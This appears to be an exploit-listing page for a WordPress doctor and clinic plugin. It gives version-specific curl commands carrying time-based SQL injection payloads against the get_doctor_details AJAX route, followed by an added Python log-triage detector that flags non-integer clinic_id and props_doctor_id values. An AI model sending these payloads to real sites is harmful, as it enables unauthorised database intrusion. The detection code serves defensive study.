## https://sploitus.com/exploit?id=WPEX-ID:53F493E9-273B-4349-8A59-F2207E8F8F30
With at least one doctor created via the plugin:

v < 2.3.4
curl 'https://example.com/wp-admin/admin-ajax.php?action=ajax_post&route_name=get_doctor_details&clinic_id%5bid%5d=(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)' --data ''

v < 2.3.5
curl 'https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)"%7D'

v < 2.3.6
curl 'https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)"%7D'

v <= 2.3.8
curl 'http://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b'
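
For log triage, an added example (not part of the original page or of the plugin's code) that flags requests to this route whose `clinic_id` or `props_doctor_id` values are not plain integers. Treating those parameters as integer-only is an assumption drawn from the benign parts of the requests above, and the function names are hypothetical.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

INT = re.compile(r"[0-9]+")
INT_LIST = re.compile(r"[0-9]+(,[0-9]+)*")  # assumed shape: comma-separated ids

def clinic_id_ok(value):
    """Accept a bare integer, or a JSON object whose "id" is an integer."""
    if INT.fullmatch(value):
        return True
    try:
        obj = json.loads(value)
    except (ValueError, RecursionError):
        return False
    if not isinstance(obj, dict) or isinstance(obj.get("id"), bool):
        return False
    return INT.fullmatch(str(obj.get("id", ""))) is not None

def bad_params(request_target):
    """Names of get_doctor_details parameters that fail the shape check."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    if query.get("route_name") != ["get_doctor_details"]:
        return []
    bad = []
    for name, values in query.items():
        for value in values:
            if name == "clinic_id":
                ok = clinic_id_ok(value)
            elif name.startswith("clinic_id["):  # array form, e.g. clinic_id[id]
                ok = INT.fullmatch(value) is not None
            elif name == "props_doctor_id":
                ok = INT_LIST.fullmatch(value) is not None
            else:
                continue
            if not ok:
                bad.append(name)
    return bad

# Constructed request targets: one benign, one shaped like the last request above.
SAMPLES = [
    '/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details'
    '&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2',
    '/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details'
    '&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b',
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(bad_params(target), target[:60])
```

Parameters sent in a POST body do not appear in standard access logs, so the same shape check belongs in a request filter or WAF rule to cover them.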